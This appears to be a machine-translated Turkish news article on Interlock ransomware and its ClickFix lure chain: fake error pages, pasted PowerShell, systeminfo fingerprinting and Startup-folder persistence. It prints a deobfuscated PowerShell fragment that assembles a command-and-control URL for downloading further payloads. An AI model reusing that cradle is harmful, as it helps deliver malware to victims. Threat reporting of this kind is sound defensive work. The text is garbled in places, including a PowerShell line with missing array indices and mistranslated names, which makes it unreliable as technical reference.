Tehdit aktörleri Windows sistemlerini tehlikeye atmak için giderek daha karmaşık yöntemler geliştirdikçe siber güvenlik manzarası gelişmeye devam ediyor.
Interlock olarak bilinen yeni bir fidye yazılımı varyantı, kurban makinelerinde kötü niyetli komutlar yürütmek için aldatıcı ClickFix sosyal mühendislik tekniğinden yararlanarak önemli bir tehdit olarak ortaya çıktı.
Bu kötü amaçlı yazılım, geleneksel kimlik avı yaklaşımlarını gelişmiş çok aşamalı yük dağıtım mekanizmalarıyla birleştirerek fidye yazılımı dağıtım taktiklerinde ilgili bir evrimi temsil eder.
Interlock fidye yazılımı, Eylül 2024’ten bu yana Kuzey Amerika ve Avrupa’daki kuruluşları aktif olarak hedefliyor ve çift gasp metodolojisi aracılığıyla açık bir finansal motivasyon gösteriyor.
Bu kötü amaçlı yazılımların arkasındaki tehdit grubu, tehlikeye atılan web siteleriyle başlayan ve tam sistem uzlaşmasıyla sonuçlanan karmaşık bir saldırı zinciri kullanan dikkate değer bir kalıcılık ve teknik gelişmişlik göstermiştir.
.webp)
Kötü amaçlı yazılımların kurban sistemlerini parmak izleme ve yüksek değerli hedeflere öncelik verme yeteneği, stratejik hedeflere sahip iyi kaynaklı bir operasyonu gösterir.
Temmuz 2025’te Esentire analistleri, fidye yazılımlarının gelişen yeteneklerini ve saldırı metodolojilerini ortaya koyarak, kilit grubuna atfedilen çok sayıda sofistike olay belirledi.
Güvenlik araştırmacıları, tehdit aktörlerinin PowerShell komut dosyaları, PHP backroors ve özel olarak inşa edilmiş uzaktan erişim araçlarını içeren çok katmanlı bir yaklaşım geliştirdiğini keşfetti.
Bu kapsamlı analiz, kötü amaçlı yazılımların operasyonel taktikleri, teknikleri ve prosedürleri hakkında önemli bilgiler sağlamıştır ve siber güvenlik topluluğuna savunma önlemleri için değerli zeka sunmaktadır.
.webp)
Saldırı, kurbanların bilmeden tehlikeye atılan web sitelerini, özellikle de Kongtuke uzlaşma zincirinden enfekte olanları ziyaret ettiklerinde başlar ve daha sonra kullanıcıları kötü niyetli tıklama fix sayfalarına yönlendirir.
ClickFix, sahte hata mesajları veya meşru görünen sistem bildirimleri sunarak mağdurları zararlı komutlar yürütmeye kandıran bir sosyal mühendislik tekniğini temsil eder.
Bu aldatıcı unsurlarla etkileşim üzerine, kurbanlardan hayali teknik sorunları çözdüğü görülen PowerShell komutlarını kopyalayıp yürütmeleri istenir.
Gelişmiş çok aşamalı enfeksiyon mekanizması
Interlock’un enfeksiyon sürecinin teknik karmaşıklığı, tehdit aktörlerinin Windows sistemi mimarisini ve kullanıcı davranış kalıplarını derinlemesine anladığını göstermektedir.
İlk ClickFix yükü, sonraki kötü amaçlı faaliyetlerin temelini oluşturan gizlenmiş bir PowerShell komutu kullanır.
.webp)
Deobfuscated komutu, komut ve kontrol altyapısından ek yükleri almak için tasarlanmış özenle hazırlanmış bir indirme beşiği ortaya çıkarır.
Kötü niyetli PowerShell komutu şu deseni izler: $gt="dng-m,i,crosoftds,com".Split(',');$yn='htt'+'ps://'+$gt+$gt[1]+$gt+'.'+$gt+'/' + 'uvA'+'4I'+'BD'+'9'+'.txt'.
Bu gizleme tekniği, etki alanı bileşenlerini böler ve işlevselliği korurken temel dize tabanlı algılama mekanizmalarından etkili bir şekilde kaçan onları dinamik olarak yeniden birleştirir.
Yürütüldükten sonra, PowerShell betiği, systeminfo komut, tehdit aktörlerinin komuta ve kontrol sunucularına aktarılan kapsamlı donanım ve yazılım bilgilerini toplamak.
Bu parmak izi işlemi, kötü amaçlı yazılımın hedef sistemin değerli bir kurbanı mı yoksa bir güvenlik araştırmacının balkosunu temsil edip etmediğini belirlemesini sağlar.
Bu analize dayanarak, kötü amaçlı yazılım ya enfeksiyon zinciri ile ilerler veya tespitten kaçınmak için sonlandırılır.
Kötü amaçlı yazılım, kurbanın başlangıç klasörüne yerleştirilen Windows kısayollarını içeren sofistike bir mekanizma yoluyla kalıcılık oluşturur.
C2.exe olarak tanımlanan basit işlem başlatıcı bileşeni, sistem problemlerinin yanılsamasını korumak için sahte hata mesajları görüntülerken ek PowerShell işlemleri ortaya çıkarmak için CreateProcessw Windows API işlevini kullanır.
Bu aldatıcı yaklaşım, Rundll32.exe gibi meşru Windows ikili dosyalarının kullanımı ile birleştiğinde, tehdit aktörlerinin kötü niyetli faaliyetleri normal sistem işlemleriyle harmanlamaya olan bağlılığını göstermektedir.
Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin